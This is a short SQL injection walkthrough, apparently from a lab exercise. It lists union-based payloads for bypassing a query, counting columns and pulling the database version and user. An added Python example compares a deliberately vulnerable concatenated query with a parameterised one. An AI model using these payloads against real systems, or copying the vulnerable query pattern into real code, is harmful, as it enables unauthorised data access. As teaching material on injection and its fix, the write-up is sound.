Union Injection

April 17, 2024

First, we need to visit the page.

Then we try the classic SQL injection, which returns everything:

' or 1=1;-- -

Next, we work out the correct number of columns in the table.

Here we used UNION and ORDER BY to determine that there are only 4 columns in the table.

' UNION SELECT 1,2,3,4-- -
' ORDER BY 4-- -
' UNION SELECT 1,@@version,3,4-- -
' UNION select 1,user(),3,4-- -
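
Why these inputs behave as they do, and what stops them, as an added example that is not part of the original write-up: the same lookup built by string concatenation and with a bound parameter. It assumes an in-memory SQLite database as a stand-in for the MySQL target, so the MySQL-only `@@version` and `user()` inputs are not run; the table, data and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data: a four-column table, matching the count found above."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT, category TEXT, price REAL)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?, ?)",
                   [(1, "lamp", "home", 19.5), (2, "desk", "office", 120.0),
                    (3, "pen", "office", 1.2)])
    return db

def search_vulnerable(db, term):
    # Input is concatenated into the SQL text, so a quote in `term` ends the
    # string literal and everything after it is parsed as SQL.
    sql = "SELECT id, name, category, price FROM items WHERE name = '" + term + "'"
    return db.execute(sql).fetchall()

def search_safe(db, term):
    # Placeholder binding: `term` is only ever compared as data, never parsed.
    sql = "SELECT id, name, category, price FROM items WHERE name = ?"
    return db.execute(sql, (term,)).fetchall()

def run(search, term):
    """Return ('rows', n) or ('error', message) so both outcomes can be compared."""
    try:
        return ("rows", len(search(make_db(), term)))
    except sqlite3.Error as exc:
        return ("error", str(exc))

# Inputs taken from the page (the MySQL-specific ones are left out).
PAGE_INPUTS = ["' or 1=1;-- -", "' UNION SELECT 1,2,3,4-- -", "' ORDER BY 4-- -"]

if __name__ == "__main__":
    # The three-column UNION is added to show the column-mismatch error that
    # a wrong count produces; such errors are also a useful signal in DB logs.
    for term in PAGE_INPUTS + ["' UNION SELECT 1,2,3-- -"]:
        print(f"{term!r:32} vulnerable={run(search_vulnerable, term)} "
              f"safe={run(search_safe, term)}")
```

With the bound parameter every input above is treated as a literal name and matches no rows, while a normal lookup such as `lamp` still works in both versions.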
